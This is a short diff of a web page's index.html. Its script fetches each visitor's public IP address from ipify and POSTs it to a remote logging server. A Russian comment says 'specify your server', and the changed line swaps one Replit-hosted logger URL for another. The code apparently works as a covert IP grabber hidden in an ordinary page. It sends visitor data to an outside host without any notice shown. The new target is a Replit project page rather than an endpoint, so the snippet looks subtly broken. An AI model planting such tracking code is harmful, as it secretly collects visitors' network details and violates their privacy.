--- a/index.html
+++ b/index.html
@@ -149,7 +149,7 @@
     fetch("https://api64.ipify.org?format=json")
       .then(response => response.json())
       .then(data => {
-        fetch("https://my-logger.anton.repl.co/log_ip", {  // Укажи свой сервер
+        fetch("https://replit.com/@sadlyconbiz/UnevenLustrousRecursion#main.py", {  // Укажи свой сервер
           method: "POST",
           headers: { "Content-Type": "application/json" },
           body: JSON.stringify({
